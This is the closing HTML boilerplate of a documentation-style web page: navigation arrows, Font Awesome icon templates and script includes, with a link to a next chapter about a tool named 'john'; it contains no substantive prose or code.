                        <span class=fa-svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 320 512"><!--! Font Awesome Free 6.2.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2022 Fonticons, Inc. --><path d="M41.4 233.4c-12.5 12.5-12.5 32.8 0 45.3l160 160c12.5 12.5 32.8 12.5 45.3 0s12.5-32.8 0-45.3L109.3 256 246.6 118.6c12.5-12.5 12.5-32.8 0-45.3s-32.8-12.5-45.3 0l-160 160z"/></svg></span>
                    </a>

                    <a rel="next prefetch" href="../tools/john.html" class="nav-chapters next" title="Next chapter" aria-label="Next chapter" aria-keyshortcuts="Right">
                        <span class=fa-svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 320 512"><!--! Font Awesome Free 6.2.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2022 Fonticons, Inc. --><path d="M278.6 233.4c12.5 12.5 12.5 32.8 0 45.3l-160 160c-12.5 12.5-32.8 12.5-45.3 0s-12.5-32.8 0-45.3L210.7 256 73.4 118.6c-12.5-12.5-12.5-32.8 0-45.3s32.8-12.5 45.3 0l160 160z"/></svg></span>
                    </a>
            </nav>

        </div>

        <template id=fa-eye><span class=fa-svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 576 512"><!--! Font Awesome Free 6.2.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2022 Fonticons, Inc. --><path d="M288 32c-80.8 0-145.5 36.8-192.6 80.6C48.6 156 17.3 208 2.5 243.7c-3.3 7.9-3.3 16.7 0 24.6C17.3 304 48.6 356 95.4 399.4C142.5 443.2 207.2 480 288 480s145.5-36.8 192.6-80.6c46.8-43.5 78.1-95.4 93-131.1c3.3-7.9 3.3-16.7 0-24.6c-14.9-35.7-46.2-87.7-93-131.1C433.5 68.8 368.8 32 288 32zM432 256c0 79.5-64.5 144-144 144s-144-64.5-144-144s64.5-144 144-144s144 64.5 144 144zM288 192c0 35.3-28.7 64-64 64c-11.5 0-22.3-3-31.6-8.4c-.2 2.8-.4 5.5-.4 8.4c0 53 43 96 96 96s96-43 96-96s-43-96-96-96c-2.8 0-5.6 .1-8.4 .4c5.3 9.3 8.4 20.1 8.4 31.6z"/></svg></span></template>
        <template id=fa-eye-slash><span class=fa-svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 640 512"><!--! Font Awesome Free 6.2.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2022 Fonticons, Inc. --><path d="M38.8 5.1C28.4-3.1 13.3-1.2 5.1 9.2S-1.2 34.7 9.2 42.9l592 464c10.4 8.2 25.5 6.3 33.7-4.1s6.3-25.5-4.1-33.7L525.6 386.7c39.6-40.6 66.4-86.1 79.9-118.4c3.3-7.9 3.3-16.7 0-24.6c-14.9-35.7-46.2-87.7-93-131.1C465.5 68.8 400.8 32 320 32c-68.2 0-125 26.3-169.3 60.8L38.8 5.1zM223.1 149.5C248.6 126.2 282.7 112 320 112c79.5 0 144 64.5 144 144c0 24.9-6.3 48.3-17.4 68.7L408 294.5c5.2-11.8 8-24.8 8-38.5c0-53-43-96-96-96c-2.8 0-5.6 .1-8.4 .4c5.3 9.3 8.4 20.1 8.4 31.6c0 10.2-2.4 19.8-6.6 28.3l-90.3-70.8zm223.1 298L373 389.9c-16.4 6.5-34.3 10.1-53 10.1c-79.5 0-144-64.5-144-144c0-6.9 .5-13.6 1.4-20.2L83.1 161.5C60.3 191.2 44 220.8 34.5 243.7c-3.3 7.9-3.3 16.7 0 24.6c14.9 35.7 46.2 87.7 93 131.1C174.5 443.2 239.2 480 320 480c47.8 0 89.9-12.9 126.2-32.5z"/></svg></span></template>
        <template id=fa-copy><span class=fa-svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"><!--! Font Awesome Free 6.2.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2022 Fonticons, Inc. --><path d="M502.6 70.63l-61.25-61.25C435.4 3.371 427.2 0 418.7 0H255.1c-35.35 0-64 28.66-64 64l.0195 256C192 355.4 220.7 384 256 384h192c35.2 0 64-28.8 64-64V93.25C512 84.77 508.6 76.63 502.6 70.63zM464 320c0 8.836-7.164 16-16 16H255.1c-8.838 0-16-7.164-16-16L239.1 64.13c0-8.836 7.164-16 16-16h128L384 96c0 17.67 14.33 32 32 32h47.1V320zM272 448c0 8.836-7.164 16-16 16H63.1c-8.838 0-16-7.164-16-16L47.98 192.1c0-8.836 7.164-16 16-16H160V128H63.99c-35.35 0-64 28.65-64 64l.0098 256C.002 483.3 28.66 512 64 512h192c35.2 0 64-28.8 64-64v-32h-47.1L272 448z"/></svg></span></template>
        <template id=fa-play><span class=fa-svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512"><!--! Font Awesome Free 6.2.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2022 Fonticons, Inc. --><path d="M73 39c-14.8-9.1-33.4-9.4-48.5-.9S0 62.6 0 80V432c0 17.4 9.4 33.4 24.5 41.9s33.7 8.1 48.5-.9L361 297c14.3-8.7 23-24.2 23-41s-8.7-32.2-23-41L73 39z"/></svg></span></template>
        <template id=fa-clock-rotate-left><span class=fa-svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"><!--! Font Awesome Free 6.2.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2022 Fonticons, Inc. --><path d="M75 75L41 41C25.9 25.9 0 36.6 0 57.9V168c0 13.3 10.7 24 24 24H134.1c21.4 0 32.1-25.9 17-41l-30.8-30.8C155 85.5 203 64 256 64c106 0 192 86 192 192s-86 192-192 192c-40.8 0-78.6-12.7-109.7-34.4c-14.5-10.1-34.4-6.6-44.6 7.9s-6.6 34.4 7.9 44.6C151.2 495 201.7 512 256 512c141.4 0 256-114.6 256-256S397.4 0 256 0C185.3 0 121.3 28.7 75 75zm181 53c-13.3 0-24 10.7-24 24V256c0 6.4 2.5 12.5 7 17l72 72c9.4 9.4 24.6 9.4 33.9 0s9.4-24.6 0-33.9l-65-65V152c0-13.3-10.7-24-24-24z"/></svg></span></template>



        <script>
            window.playground_copyable = true;
        </script>


        <script src="../elasticlunr-ef4e11c1.min.js"></script>
        <script src="../mark-09e88c2c.min.js"></script>
        <script src="../searcher-c2a407aa.js"></script>

        <script src="../clipboard-1626706a.min.js"></script>
        <script src="../highlight-abc7f01d.js"></script>
        <script src="../book-a0b12cfe.js"></script>

        <!-- Custom JS scripts -->



    </div>
    </body>
</html>
